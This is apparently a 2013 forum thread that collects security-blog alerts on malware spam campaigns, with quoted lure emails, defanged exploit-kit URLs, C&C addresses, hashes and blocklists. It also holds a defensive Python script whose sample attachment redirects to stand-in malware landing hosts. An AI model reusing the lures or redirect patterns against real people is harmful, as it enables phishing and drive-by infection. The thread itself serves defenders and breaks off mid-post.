- http://blog.webroot.com/2013/03/12/fake-bofa-cashpro-online-digital-certificate-themed-emails-lead-to-malware/
March 12, 2013 - "Over the past 24 hours, we intercepted tens of thousands of malicious emails attempting to socially engineer BofA’s CashPro users into downloading and executing a -bogus- online digital certificate attached to the fake emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/email_spam_malware_cashpro_social_engineering.png
Detection rate for the malicious executable: MD5: bfe7c4846823174cbcbb10de9daf426b * ... Password-Stealer.
The attachment uses the following naming convention:
cashpro_cert_7585cc6726.zip
cashpro_cert_cc1d4a119071.zip...
It then attempts to connect to 74.207.227.67; 17.optimaxmagnetics .us, and successfully establishes a connection with the C&C server at 50.28.90.36 :8080/forum/viewtopic.php...
More MD5s are known to have phoned back to the same IP..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/4a6ab406f82e620a24e25d717ba04657d9b2ef254d7d852323ba2d077c0bcdf3/analysis/
File name: Ywiti
Detection ratio: 36/45
Analysis date: 2013-03-11
___
Fake "End of Aug. Stat. Required" SPAM / giminkfjol .ru
- http://blog.dynamoo.com/2013/03/end-of-aug-stat-required-spam.html
12 March 2013 - "This spam leads to malware on giminkfjol .ru:
From: user @victimdomain .com
Sent: 12 March 2013 04:19
Subject: Re: End of Aug. Stat. Required
Good morning,
as reqeusted I give you inovices issued to you per dec. 2012 ( Internet Explorer file)
Regards
The attachment Invoices-ATX993823.htm attempts to redirect the victim to [donotclick]giminkfjol .ru:8080/forum/links/column.php (report here*) hosted on:
5.9.40.136 (Hetzner, Germany)
94.102.14.239 (Netinternet, Turkey)
213.215.240.24 (COLT, Italy)
Blocklist:
5.9.40.136
94.102.14.239
213.215.240.24
giminkfjol .ru ..."
* http://urlquery.net/report.php?id=1389261
... Detected suspicious URL pattern... Blackhole 2 Landing Page 213.215.240.24
___
HP LaserJet printer backdoor
- http://h-online.com/-1821334
12 March 2013 - "A number of HP LaserJet printers can be accessed through the network and unencrypted data can be read from them without authentication. The US-CERT has issued an advisory* that warns users of these printers and is calling on them to update the printer's firmware with a fixed version... HP's own advisory** identifies HP LaserJet Pro P1102w, P1606dn, M1212nf MFP (Multi Function Printer), M1213nf MFP, M1214nfh MFP, M1216nfh MFP, M1217nfw MFP, M1219nf MFP and CP1025nw printers as affected by the problem and has issued firmware and installation instructions for that firmware to close the vulnerability."
* http://www.kb.cert.org/vuls/id/782451
Last revised: 11 Mar 2013
** https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03684249
Last Updated: 2013-03-06
References: CVE-2012-5215
___
Fake News Diet Supplement Site
- http://www.gfi.com/blog/thinspo-tumblr-page-leads-to-fake-news-diet-supplement-site/
March 12, 2013 - "... something called “Thinspo” – it’s a shortened term for “Thinspiration”, usually a tag on social media sites... an attempt at directing such individuals to fake news websites touting “green coffee” weight loss offers. Here’s the Tumblr in question, which contains numerous “Thinspo” pictures...
> http://www.gfi.com/blog/wp-content/uploads/2013/03/thinspo1.jpg
Sending kids and teens with potentially serious body image hang-ups to -fake- news report sites such as this which practically beg them to sign up and lose weight is incredibly creepy... It’s entirely possible there’s more of them lurking on various social networks though, so please be aware that no matter how controversial the subject, someone is always going to want to take advantage of it for their own benefit."
___
Fake ACH Batch Download Notification
- http://security.intuit.com/alert.php?a=77
11 Mar 2013 - "People are receiving fake emails with the title 'ACH Batch Download Notification'. Below is a copy of the email people are receiving, including the mistakes shown.
Refund check in the amount of $4,370.00 for
The following ACH batch has been submitted for processing.
Initiated By: colleen
Initiated Date & Time: Mon, 11 Mar 2013 19:59:38 +0500 Batch ID: 8242710 Batch Template Name: PAYROLL
Please view the attached file to review the transaction details.
This is the end of the fake email.
Steps to Take Now
- Do -not- click on the link in the email or open the attached file...
- Delete the email."
___
Fake Wire Transfer SPAM / giminanvok .ru
- http://blog.dynamoo.com/2013/03/wire-transfer-spam-giminanvokru.html
11 Mar 2013 - "Another wire transfer spam, this time leading to malware on giminanvok .ru:
Date: Mon, 11 Mar 2013 02:46:19 -0300 [01:46:19 EDT]
From: LinkedIn Connections [connections@linkedin.com]
Subject: Fwd: Wire Transfer (5600LJ65)
Dear Bank Account Operator,
WIRE TRANSFER: FED694760330367340
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
The malicious payload is at [donotclick]giminanvok .ru:8080/forum/links/column.php (report pending*) hosted on the same IPs used earlier today:
5.9.40.136 (Hetzner, Germany)
66.249.23.64 (Endurance International Group, US)
94.102.14.239 (Netinternet, Turkey)
I strongly recommend that you block access to these IPs if you can."
:mad:
AplusWebMaster
2013-03-13, 14:42
FYI...
Fake BBB emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/03/13/spamvertised-bbb-your-accreditation-terminated-themed-emails-lead-to-black-hole-exploit-kit/
March 13, 2013 - "Over the past week, a cybercriminal/gang of cybercriminals whose activities we’ve been actively profiling over a significant period of time, launched two separate massive spam campaigns, this time impersonating the Better Business Bureau (BBB), in an attempt to trick users into thinking that their BBB accreditation has been terminated. Once users click on any of the links found in the malicious emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the first BBB themed spamvertised campaign:
> https://webrootblog.files.wordpress.com/2013/03/bbb_better_business_bureau_email_spam_exploits_malware_black_hole_exploit_kit.png
Sample screenshot of the second BBB themed spamvertised campaign:
> https://webrootblog.files.wordpress.com/2013/03/bbb_better_business_bureau_email_spam_exploits_malware_black_hole_exploit_kit_01.png
... Malicious domain names reconnaissance:
bbb-complaint .org – 63.141.224.171; 149.154.68.214; 155.239.247.247 – Email: gonumina1 @dbzmail .com
Name Server: NS1.STREETCRY .NET – 93.186.171.133 – Email: webclipradio @aol .com
Name Server: NS2.STREETCRY .NET – 15.214.13.118 – Email: webclipradio@aol .com
bbb-accredited .net – not responding
Responding to 149.154.68.214 are also the following malicious domains:
fab73 .ru, misharauto .ru
secureaction120 .com – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: markovochn @yandex .ru
secureaction150 .com – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: markovochn @yandex .ru
iberiti .com – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: biedermann @iberiti .com
notsk .com – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: jenifer@notsk .com
metalcrew .net – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: heffner@metalcrew .net
roadix .net – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: marunga@roadix .net
gatovskiedelishki.ru – 149.154.68.214; 155.239.247.247; 141.0.176.234 conbicormiks .ru
Name servers used in the campaign:
Name Server: NS1.STREETCRY .NET – 93.186.171.133 – Email: webclipradio @aol .com
Name Server: NS2.STREETCRY .NET – 15.214.13.118 – Email: webclipradio @aol .com
Name Server: NS1.E-ELEVES .NET – 173.208.88.196
Name Server: NS1.E-ELEVES .NET – 43.109.79.23
Name Server: NS1.LETSGOFIT .NET – 173.208.88.196 – Email: weryrebel @live.com
Name Server: NS1.LETSGOFIT .NET – 11.3.51.158 – Email: weryrebel @live .com
Name Server: NS1.BLACKRAGNAROK .NET – 209.140.18.37 – Email: onetoo @gmx .com
Name Server: NS2.BLACKRAGNAROK .NET – 6.20.13.25 – Email: onetoo @gmx .com
Name Server: NS1.OUTBOUNDUK .NET
Name Server: NS2.OUTBOUNDUK .NET
Not surprisingly, we’ve already seen the onetoo @gmx .com email in the following previously profiled malicious campaign – “Malicious ‘Data Processing Service’ ACH File ID themed emails serve client-side exploits and malware“.
Upon successful client-side exploitation, a sampled campaign drops: MD5: 126a104f260cb0059b901c6a23767d76 * ... Worm:Win32/Cridex.E ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/18bb7b1bd5a9f9433649fc4b737eda32e32538a2d40e49afc786ca94993b3f77/analysis/
File name: cf2d476e6b1a8eae707ffae520c4d019c7226948
Detection ratio: 28/45
Analysis date: 2013-03-10
___
- http://gfisoftware.tumblr.com/post/44796405851/your-better-business-bureau-accreditation-has-been
5 days ago - "... Subjects seen:
BBB Accreditation Terminated
Typical e-mail details:
Valued Owner:
Your accreditation with Better Business Beaureau was Discontinued
A number of latest claims on you / your company motivated us to provisional Suspend your accreditation with Better Business Beaureau. The information about the our decision are available for review at a link below. Please give attention to this issue and inform us about your sight as soon as possible.
We amiably ask you to click and review the SUSPENSION REPORT to meet on this grievance.
If you think you got this email by mistake - please forward this message to your principal or accountant
We awaits to your prompt rebound ..."
___
Zbot sites to block 13/3/13
- http://blog.dynamoo.com/2013/03/zbot-sites-to-block.html
13 Mar 2013 - "These domains and IPs seem to be active as Zbot C&C servers. The obsolete .su (Soviet Union) domain is usually a tell-tale sign of.. something*.
76.185.101.239
77.74.197.190
89.202.183.27
89.253.234.247
201.236.78.182
218.249.154.140
aesssbacktrack .pl
beveragerefine .su
dinitrolkalor .com
dugsextremesda .su
establishingwi .su
eurasianpolicy .net
euroscientists .at
ewebbcst .info
fireinthesgae .pl
girdiocolocai .com
machinelikeleb .su
mixedstorybase .su
satisfactorily .su
smurfberrieswd .su
sputtersmorele .pl
suggestedlean .com
trashinesscro .com
upkeepfilesyst .su
URLs seen:
[donotclick]beveragerefine .su/hjz/file.php
[donotclick]euroscientists .at/hjz/file.php
[donotclick]machinelikeleb .su/fiv/gfhk.php
[donotclick]mixedstorybase .su/hjz/file.php
[donotclick]satisfactorily .su/hjz/file.php
[donotclick]smurfberrieswd .su/hjz/file.php
And for the record, those IPs belong to:
76.185.101.239 (Road Runner, US)
77.74.197.190 (UK Dedicated Servers, UK)
89.202.183.27 (Interoute / PSI, UK)
89.253.234.247 (Rusonyx, Russia)
201.236.78.182 (Municipalidad De Quillota, Chile)
218.249.154.140 (Beijing Zhongbangyatong Telecom, China)..."
* https://www.abuse.ch/?p=3581
___
Fake "Wapiti Lease Corp" SPAM / giminaaaao .ru
- http://blog.dynamoo.com/2013/03/wapiti-lease-corporation-spam.html
13 March 2013 - "A fairly bizarre spam leading to malware on giminaaaao .ru:
From: IESHA WILLEY [mailto:AtticusRambo @tui-infotec .com]
Sent: 13 March 2013 11:22
To: Sara Smith
Subject: Fwd: Wapiti Land Corporation Guiding Principles attached
Hello,
Attached is a draft of the Guiding Principles that the Wapiti Lease Corporation (“W.L.C”) would like to publish. Prior to doing that, WLC would like you to have an opportunity for a preview and to provide any
comments that you would like to make. Please let me know that you have reviewed it and what comments you might have.
Thank you,
IESHA WILLEY
WLC
This comes with an attachment called WLC-A0064.htm although I have another sample "from" a DEANNE AMOS with an attachment of WLC-A5779.htm. In any case, the attachment tries to direct the victim to a malware landing page at [donotclick]giminaaaao .ru:8080/forum/links/column.php (report here*) hosted on:
93.174.138.48 (Cloud Next / Node4, UK)
94.102.14.239 (Netinternet , Turkey)
213.215.240.24 (COLT, Italy)
Blocklist:
93.174.138.48
94.102.14.239
213.215.240.24
giminaaaao .ru
giminkfjol .ru
giminanvok .ru "
* http://urlquery.net/report.php?id=1406092
... Detected suspicious URL pattern... Blackhole 2 Landing Page 94.102.14.239
___
Fake "Copies of policies" SPAM / giimiiifo .ru
- http://blog.dynamoo.com/2013/03/copies-of-policies-spam-giimiiiforu.html
13 Mar 2013 - "This spam leads to malware on giimiiifo .ru:
Date: Wed, 13 Mar 2013 06:49:25 +0100
From: LinkedIn Email Confirmation [emailconfirm @linkedin .com]
Subject: RE: Alonso - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Alonso SAMS,
The malicious payload is at [donotclick]giimiiifo .ru:8080/forum/links/column.php hosted on two IPs we saw earlier:
94.102.14.239 (Netinternet , Turkey)
213.215.240.24 (COLT, Italy)"
:mad:
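Added example, not code from any of the quoted posts: the Invoices-*.htm and WLC-*.htm attachments in the items above are described only as redirecting the browser to the .ru:8080 landing page. This Python pass pulls the redirect targets out of such an attachment statically, checking meta refresh, JavaScript location assignments and hidden iframes. Those mechanisms are an assumption of the example; the posts do not say which one the real attachments used. The attachment body and its .invalid hostnames are constructed.

```python
"""Static redirect extraction from an .htm mail attachment (added example, not from the posts above)."""
import html
import re
from urllib.parse import urlsplit

# Mechanisms checked here are the common plain ones; the posts above do not say
# which one the real attachments used, so this is an assumption of the example.
META_REFRESH = re.compile(
    r'<meta\b[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']([^"\']+)["\']',
    re.IGNORECASE | re.DOTALL,
)
JS_LOCATION = re.compile(r'\blocation(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
JS_REPLACE = re.compile(
    r'\blocation\.(?:replace|assign)\(\s*["\']([^"\']+)["\']\s*\)', re.IGNORECASE
)
IFRAME_SRC = re.compile(r'<iframe\b[^>]*src\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

# Constructed attachment body; the hostnames are invented (.invalid TLD).
SAMPLE_HTM = """<html><head>
<meta http-equiv="refresh" content="0; URL=http://landing-sample.invalid:8080/forum/links/column.php">
</head><body>
<p>Please wait while the invoice loads...</p>
<script type="text/javascript">
window.location = "http://landing-sample.invalid:8080/forum/links/column.php";
</script>
<iframe src="http://second-sample.invalid/ads/frame.html" width="1" height="1"></iframe>
</body></html>"""


def extract_redirects(doc):
    """Return (mechanism, url) pairs for every outbound redirect found in doc."""
    found = []
    for m in META_REFRESH.finditer(doc):
        content = html.unescape(m.group(1))   # e.g. "0; URL=http://..."
        idx = content.lower().find("url=")
        if idx != -1:
            found.append(("meta-refresh", content[idx + 4:].strip().strip("'\"")))
    for m in JS_LOCATION.finditer(doc):
        found.append(("js-location", html.unescape(m.group(1))))
    for m in JS_REPLACE.finditer(doc):
        found.append(("js-location", html.unescape(m.group(1))))
    for m in IFRAME_SRC.finditer(doc):
        found.append(("iframe", html.unescape(m.group(1))))
    return found


def hosts_from(redirects):
    """Distinct target hostnames, sorted, ready to compare with a blocklist."""
    hosts = set()
    for _mech, url in redirects:
        host = urlsplit(url).hostname
        if host:
            hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    targets = extract_redirects(SAMPLE_HTM)
    for mech, url in targets:
        print(f"{mech:13} {url}")
    print("hosts:", ", ".join(hosts_from(targets)))
```

This catches the plain forms only. An attachment that builds the target from escaped strings or document.write calls needs a JavaScript sandbox (or a detonation in an isolated VM) rather than regexes; if the static pass returns nothing on a file that still renders a blank "please wait" page, treat that as a reason to look harder, not as a clean result. The hostnames it does return can be checked straight against the blocklists in the items above.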
AplusWebMaster
2013-03-14, 20:49
FYI...
Fake Efax SPAM / gimiinfinfal .ru
- http://blog.dynamoo.com/2013/03/efax-corporate-spam-gimiinfinfalru.html
14 Mar 2013 - "This eFax-themed spam leads to malware on gimiinfinfal .ru:
Date: Thu, 14 Mar 2013 07:39:23 +0300
From: SarahPoncio @mail .com
Subject: Efax Corporate
Attachments: Efax_Corporate.htm
Fax Message [Caller-ID: 449555234]
You have received a 44 pages fax at Thu, 14 Mar 2013 07:39:23 +0300, (751)-674-3105.
* The reference number for this fax is [eFAX-263482326].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.
There's an attachment called Efax_Corporate.htm which leads to malware on [donotclick]gimiinfinfal .ru:8080/forum/links/column.php (report here) hosted on:
94.102.14.239 (Netinternet, Turkey)
50.116.23.204 (Linode, US)
213.215.240.24 (COLT, Italy)
Blocklist:
50.116.23.204
94.102.14.239
213.215.240.24
giimiiifo .ru
___
Fake LinkedIn SPAM / teenlocal .net
- http://blog.dynamoo.com/2013/03/linkedin-spam-teenlocalnet.html
14 March 2013 - "This fake LinkedIn spam leads to malware on teenlocal .net:
From: messages-noreply@bounce .linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of LinkedIn
Sent: 14 March 2013 16:32
Subject: Frank and Len have endorsed you!
Congratulations! Your connections Frank Garcia and Len Rosenthal have endorsed you for the following skills and expertise:
Program Management
Strategic Planning
Continue
You are receiving Endorsements emails. Unsubscribe.
This email was intended for Paul Stevens (Chief Financial Officer, Vice President and General Manager, Aerospace/Defense, Pacific Consolidated Industries). Learn why we included this. 2013, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is at [donotclick]teenlocal.net/kill/force-vision.php (report here) hosted on:
24.111.157.113 (Midcontinent Media, US)
58.26.233.175 (Telekom Malaysia, Malaysia)
155.239.247.247 (Centurion Telkom, South Africa)
Blocklist:
24.111.157.113
58.26.233.175
155.239.247.247 ..."
(More detail at the dynamoo URL above.)
:fear::mad:
AplusWebMaster
2013-03-15, 15:36
FYI...
Fake Wire Transfer emails serve client-side exploits and malware
- http://blog.webroot.com/2013/03/15/cybercriminals-resume-spamvertising-re-fwd-wire-transfer-themed-emails-serve-client-side-exploits-and-malware/
March 15, 2013 - "Over the last couple of days, a cybercriminal/gang of cybercriminals that we’ve been extensively profiling, resumed spamvertising tens of thousands of emails, in an attempt to trick users into thinking that they have a pending wire transfer. Once users click on any of the links found in the malicious emails, they’re exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/email_spam_exploits_malware_black_hole_exploit_kit_wire_transfer.png
... Sample client-side exploits serving URL: hxxp://gimikalno .ru:8080/forum/links/column.php
Sample malicious payload dropping URL: hxxp://gimikalno .ru:8080/forum/links/column.php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
Upon successful client-side exploitation, the campaign drops MD5: 93a104caf7b01de69614498de5cf870a * ... Trojan.FakeMS
... phones back to:
149.156.96.9 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
72.251.206.90 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
202.29.5.195 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
213.214.74.5 /AJtw/UCyqrDAA/Ud+asDAA/
We’ve already seen 213.214.74.5 in... previously profiled campaigns
Malicious domain name reconnaissance:
gimikalno .ru – 66.249.23.64; 94.102.14.239; 5.9.40.136
Name Servers: ns1.gimikalno .ru 41.168.5.140
Name Servers: ns2.gimikalno .ru 110.164.58.250 (nangrong.ac.th)
Name Servers: ns3.gimikalno .ru 210.71.250.131 (tecom.com.tw)
Name Servers: ns4.gimikalno .ru 194.249.217.8 (gimnazija-tolmin1.si)
Name Servers: ns5.gimikalno .ru 72.251.206.90 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/b87c1be1dd90d9ae8e7b04c87a6ab0a2b706ded02e2f4c3db45db1bed9d46642/analysis/
File name: docprop.dll
Detection ratio: 26/45
Analysis date: 2013-03-13
___
Malware sites to block 15/3/13
- http://blog.dynamoo.com/2013/03/malware-sites-to-block-15313.html
15 March 2013 - "These seem to be the currently active IPs and domains being used by the RU:8080 gang. Of these the domain gilaogbaos .ru seems to be very active this morning. Block 'em if you can:
5.9.40.136
41.72.150.100
50.116.23.204
66.249.23.64
94.102.14.239
212.180.176.4
213.215.240.24...
For the record, these are the registrars either hosting the domains or offering support services. It is possible that some have been taken down already.
5.9.40.136 (Hetzner, Germany)
41.72.150.100 (Hetzner, South Africa)
50.116.23.204 (Linode, US)
66.249.23.64 (Endurance International Group, US)
94.102.14.239 (Netinternet, Turkey)
212.180.176.4 (Supermedia, Poland)
213.215.240.24 (COLT, Italy) ..."
(More listed at the dynamoo URL above.)
___
Fake ADP SPAM / picturesofdeath .net
- http://blog.dynamoo.com/2013/03/adp-package-delivery-confirmation-spam.html
15 March 2013 - "This fake ADP spam leads to malware on... picturesofdeath .net:
From: ADP Chesapeake Package Delivery Confirmation [mailto:do_not_reply @adp .com]
Sent: 15 March 2013 14:45
Subject: =?iso-8859-1?Q?ADP Chesapeake - Package Delivery Notification
Importance: High
This message is to notify you that your package has been processed and is on schedule for delivery from ADP.
Here are the details of your delivery:
Package Type: QTR/YE Reporting
Courier: UPS Ground
Estimated Time of Arrival: Tusesday, 5:00pm
Tracking Number (if one is available for this package): 1Z023R643116536498
Details: Click here to overview and/or modify order
We will notify you via email if the status of your delivery changes.
Access these and other valuable tools at support.ADP.com:
o Payroll and Tax Calculators
o Order Payroll Supplies, Blank Checks, and more
o Submit requests online such as SUI Rate Changes, Schedule Changes, and more
o Download Product Documentation, Manuals, and Forms
o Download Software Patches and Updates
o Access Knowledge Solutions / Frequently Asked Questions
o Watch Animated Tours with Guided Input Instructions
Thank You,
ADP Client Services
support.ADP.com ...
The malicious payload is at [donotclick]picturesofdeath.net/kill/long_fills.php (report here*) hosted on:
24.111.157.113 (Midcontinent Media, US)
155.239.247.247 (Centurion Telkom, South Africa)..."
(More URLs listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1446662
... Detected live BlackHole v2.0 exploit kit 24.111.157.113
- http://blog.webroot.com/2013/03/18/adp-package-delivery-notification-themed-emails-lead-to-black-hole-exploit-kit/
March 18, 2013 - "A currently ongoing malicious email campaign is impersonating ADP in an attempt to trick its customers into thinking that they’ve received a ‘Package Delivery Notification.’ In reality though, once a user clicks on any of the links found in the malicious email, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/adp_package_delivery_notification_email_spam_exploits_malware_black_hole_exploit_kit.png
... responded to 24.111.157.113; 58.26.233.175; 155.239.247.247... 58.26.233.175; 155.239.247.247... 77.241.198.65; 80.241.211.26; 83.255.90.5; 103.14.8.20; 190.30.219.85... phones back to 212.68.63.82..."
(More detail at the webroot URL above.)
___
BoA SPAM - on short list of Scammers’ Spam Lures
- http://www.hotforsecurity.com/blog/bank-of-america-on-short-list-of-scammers-spam-lures-5668.html
March 15, 2013 - "... crooks unleashed a series of aggressive spam campaigns that include the Bank of America in the title as bait. In the context of a security breach, the name of the bank was used to catch customers’ attention, infect them with malware, have them type in sensitive data or entice them into sending money in advance for a service they will never receive. “Online Banking Passcode Modified” invites people to click a link to reset their online banking passcode. The same template and con is entirely recycled from a similar attack in November 2012. This new spamvertised malware campaign attempts to get Bank of America customers to -click a link- to a webpage associated with the Redkit Exploit Kit – a crimeware tool that exploits vulnerabilities in browsers and plugins to silently infect victims’ PCs.
> http://www.hotforsecurity.com/wp-content/uploads/2013/03/Online-Banking-Passcode-Modified.png
"Bank of America Corporate Office Headquarters” and the very recent “Payment Notification from Bank of America” spam campaigns are examples of a complicated Nigerian-like scam informing customers that their funds will be transferred to the United States Treasury Account...
> http://www.hotforsecurity.com/wp-content/uploads/2013/03/Bank-of-America-Corporate-Office-Headquarters.png
"Bank of America Alert: Suspicious Activities on your Account!” and “Bank of America Alert: Sign-in to Online Banking Locked” lure customers to a phishing page...
> http://www.hotforsecurity.com/wp-content/uploads/2013/03/Bank-of-America-Alert-Suspicious-Activities-on-your-Account.png
"Reminder: Bank of America Customer Survey” is another active scam ...
> http://www.hotforsecurity.com/wp-content/uploads/2013/03/Reminder-Bank-of-America-Customer-Survey.png
Bank of America has been recycled in spammed scams since 2006 and used multiple times a year, for more or less the same results: steal card and identity information, infect people with malware, and unwarily recruit them into money-muling operations..."
:mad:
AplusWebMaster
2013-03-18, 22:01
FYI...
Fake LinkedIn SPAM / applockrapidfire .biz
- http://blog.dynamoo.com/2013/03/linkedin-spam-applockrapidfirebiz.html
18 March 2013 - "This fake LinkedIn spam leads to malware on applockrapidfire .biz:
From: David O'Connor - LinkedIn [mailto:kissp @gartenplandesign .de]
Sent: 18 March 2013 15:34
Subject: Join my network on LinkedIn
Importance: High
LinkedIn
REMINDERS
Invitation reminders:
From David O\'Connor (animator at ea)
PENDING MESSAGES
There are a total of 9 messages awaiting your response. Go to InBox now.
This message was sent to username @domain .com. Don't want to receive email notifications? Login to your LinkedIn account to Unsubscribe.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission. c 2013, LinkedIn Corporation.
The link in the message goes through a legitimate hacked site to a malware landing page on [donotclick]applockrapidfire .biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php (report here*) hosted on 78.46.222.237 (Hetzner, Germany). applockrapidfire .biz was registered just today to a presumably fake address...
URLquery detects traffic to these additional IPs that you might want to block too:
50.22.196.70 (Softlayer / Maxmind LLC, US)
66.85.130.234 (Secured Servers LLC / Phoenix NAP, US)
194.165.17.3 (ADM Service Ltd, Monaco)
The nameservers are NS1.QUANTUMISPS .COM (5.9.212.43: Hetzner, Germany) and NS2.QUANTUMISPS .COM (66.85.131.123: Secured Servers LLC / Phoenix NAP, US). quantumisps .com was registered to an anonymous person on 2013-03-15...
Recommended blocklist:
5.9.212.43
50.22.196.70
66.85.130.234
66.85.131.123
78.46.222.237
194.165.17.3
quantumisps .com
applockrapidfire .biz"
* http://urlquery.net/report.php?id=1500577
... Detected live BlackHole v2.0 exploit kit
___
Fake DHL emails contain malware
- http://nakedsecurity.sophos.com/2013/03/18/express-shipment-notification-emails-malware/
March 18, 2013 - "... Online criminals have spammed out a large number of messages, claiming to come from DHL Express International, that are designed to install malware onto the computers of unsuspecting PC users. Here is what a typical example of an email spammed out in the attack looks like:
> https://sophosnews.files.wordpress.com/2013/03/dhl.jpg?w=640
Attached to the emails is a ZIP file, containing malware. The filename of the ZIP file can vary, but takes the form "DHL reportXXXXXX.zip" (where the 'X's are a random code)... Troj/BredoZp-S* ..."
* http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~BredoZp-S.aspx
:mad:
AplusWebMaster
2013-03-19, 16:52
FYI...
Fake "Statement Reqiured" SPAM / hiskintako .ru
- http://blog.dynamoo.com/2013/03/end-of-aug-statement-reqiured-spam.html
19 Mar 2013 - "This -spam- leads to malware on hiskintako .ru:
Date: Tue, 19 Mar 2013 08:04:18 +0300
From: "package update Ups" [upsdelivercompanyb @ups .com]
Subject: Re: FW: End of Aug. Statement Reqiured
Attachments: Invoices-CAS9927.htm
Hi,
as reqeusted I give you inovices issued to you per dec. 2012 ( Internet Explorer file)
Regards
-----------------------
Date: Tue, 19 Mar 2013 02:18:06 +0600
From: MyUps [ups-delivery-services @ups .com]
Subject: Re: FW: End of Aug. Stat. Required
Hi,
as reqeusted I give you inovices issued to you per dec. 2012 ( Internet Explorer file)
Regards
The malicious payload is at [donotclick]hiskintako .ru:8080/forum/links/column.php (report here*) hosted on:
50.22.0.2 (SoftLayer, US)
89.110.131.10 (Netclusive, Germany)
132.230.75.95 (Albert-Ludwigs-Universitaet, Germany)
188.165.202.204 (OVH, France)
BLOCKLIST:
50.22.0.2
89.110.131.10
132.230.75.95
188.165.202.204
forumla .ru
gimiiiank .ru
giminanvok .ru
giminkfjol .ru
giminaaaao .ru
giimiiifo .ru
giliaonso .ru
forumny .ru
hiskintako .ru
gxnaika .ru
gulivaerinf .ru "
* http://urlquery.net/report.php?id=1516090
... Detected live BlackHole v2.0 exploit kit 50.22.0.2
___
Squeak Data / squeakdata .com SPAM
- http://blog.dynamoo.com/2013/03/squeak-data-squeakdatacom-spam.html
19 March 2013 - "... The email address they are sending to has been harvested, so you can be pretty sure that the mailing lists they sell are of very low quality. But there's a bit more to this spam than meets the eye..
From: Squeak Data [enquiries @squeakdata .com] via smtpguru .net
Date: 19 March 2013 13:35
Subject: Squeak Data
Signed by: smtpguru .net
Squeak Data - Qualified & Opted In Prospect Data
- At a fraction of the usual price. We own all the data we sell so we can keep our prices extremely competitive but still deliver on quality and service.
New January 2013 Opted In Business Database - contains over 437k records. This data set is completely new and unique to us. It has been strictly opted in at decision maker level. It contains SME businesses throughout the UK. Every record contains full information fields including a live and valid email address.
We are aware that much larger business databases are currently been offered. It takes a lot of hard work and man hours to produce a truly opted in and quality prospect list. Common sense must prevail and conclude that such large databases cannot possibly be opted in and are very old and tired.
We do not hold old and tired data. Our data is fresh, unique and will help you accomplish your new business targets.
Our data is sold with a 95% email delivery promise and on a multiple use basis...
The domain was registered on 2nd March, so it's only a few days old. But that email address looks familiar.. yes, this is Toucan UK who said last year that they were closing down their business. It turns out that this is a lie too. A brief bit of Googling also brings up this other spam where they are saying pretty much the same thing. It looks like they used to have a Twitter handle of @MoneyTreesData although that appears to have been nuked. Oh well.
Give these spammers a wide berth."
___
Fake Facebook SPAM / heelicotper .ru
- http://blog.dynamoo.com/2013/03/facebook-spam-heelicotperru.html
19 Mar 2013 - "This fake Facebook spam leads to malware on heelicotper .ru:
Date: Tue, 19 Mar 2013 08:37:37 +0200
From: Facebook [updateSIXQG03I44AX @facebookmail .com]
Subject: You have notifications pending
facebook
Hi,
Here's some activity you may have missed on Facebook.
TAMISHA Gore has posted statuses, photos and more on Facebook.
Go To Facebook
See All Notifications
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future or have your email address used for friend suggestions, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
The malicious payload is at [donotclick]heelicotper .ru:8080/forum/links/column.php which isn't resolving at the moment, but was earlier hosted on:
50.22.0.2 (SoftLayer, US)
132.230.75.95 (Albert-Ludwigs-Universitaet, Germany)
188.165.202.204 (OVH, France)
The payload and associated IPs are the same as in this attack."
___
Malware spam: Cyprus banks...CNN.com / salespeoplerelaunch .org
- http://blog.dynamoo.com/2013/03/malware-spam-opinion-cyprus-banks-shut.html
19 Mar 2013 - "This topically themed (but fake) CNN spam leads to malware on salespeoplerelaunch .org:
Date: Tue, 19 Mar 2013 10:40:22 -0600
From: "CNN Breaking News" [BreakingNews@mail.cnn.com]
Subject: Opinion: Cyprus banks shut extended to Monday - CNN.com
Powered by
* Please note, the sender's email address has not been verified.
You have received the following link from BreakingNews @mail.cnn .com:
